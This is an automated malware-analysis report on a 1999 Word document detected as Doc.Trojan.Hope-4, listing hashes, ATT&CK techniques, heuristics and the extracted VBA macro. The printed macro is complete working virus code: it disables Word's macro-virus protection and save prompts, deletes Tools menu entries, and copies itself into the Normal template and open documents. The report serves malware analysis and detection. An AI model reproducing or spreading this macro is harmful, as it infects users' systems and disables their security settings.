Office (OLE) malware analysis — malicious · 00e4328eb3e4f95c

MALICIOUS

Office (OLE)

36.5 KB Created: 1999-06-23 21:08:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 07882205cd1e93b0be7bf302402c9fe1 SHA-1: f46fd98002d98523435236990b4aabd4972f23eb SHA-256: 00e4328eb3e4f95cbdcb171b1f155f116a88e674806381cf63badf6b31ea6c1f

180 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious documents. The script attempts to disable security features like 'ConfirmConversions' and 'VirusProtection', and then overwrites the macro code in both the active document and the Normal template with its own code. This suggests an attempt to evade detection and potentially establish persistence. The file is identified by ClamAV as Doc.Trojan.Hope-4.

Heuristics 3

ClamAV: Doc.Trojan.Hope-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hope-4
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1751 bytes
SHA-256: `ccad0d51710f1dd7ceb507ace73002ecd0075151fe2e19ee5d552ae692bedf1c`
Detection ClamAV: Doc.Trojan.Hope-4 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open(): Document_Close: End Sub 'withered rope you hang what's empty can't remain to put it simply Private Sub Document_Close(): On Error Resume Next 'in time cry the hollow words to sing with false disguise smothered Options.ConfirmConversions = (0 - 0): Options.SaveNormalPrompt = (1 - 1): Options.VirusProtection = (2 - 2) 'hope fly from sorrow for a new divine tomorrow i just don't want CommandBars("Tools").Controls("Macro").Delete: CommandBars("Tools").Controls("Options...").Delete 'to know anymore life shifts up and down everybody knows it's wrong Set CM = MacroContainer.VBProject.VBComponents.Item(1).CodeModule 'why don't you care? now do it seem fair? it's not in the rhyme or Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule 'reason so it goes with every season crawl to top fall through Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule 'bottom first hand love is really rotten slice of life find what's MC = CM.Lines(1, CM.CountOfLines) 'plenty inch towards a sanctuary light with me inside the womb i AD.DeleteLines 1, AD.CountOfLines: AD.AddFromString MC 'know everyone everybody knows it's me it's my voice, my voice NT.DeleteLines 1, NT.CountOfLines: NT.AddFromString MC 'cries out obscenity sightless eye regard my past sometimes it ActiveDocument.SaveAs FileName:=ActiveDocument.FullName 'should i just don't want to know anymore. End Sub 'NoHope~By~Lys~KovicK Lyrics From Smothered Hope(Skinny Puppy)

Open this report in the interactive analyzer, or submit your own file for analysis.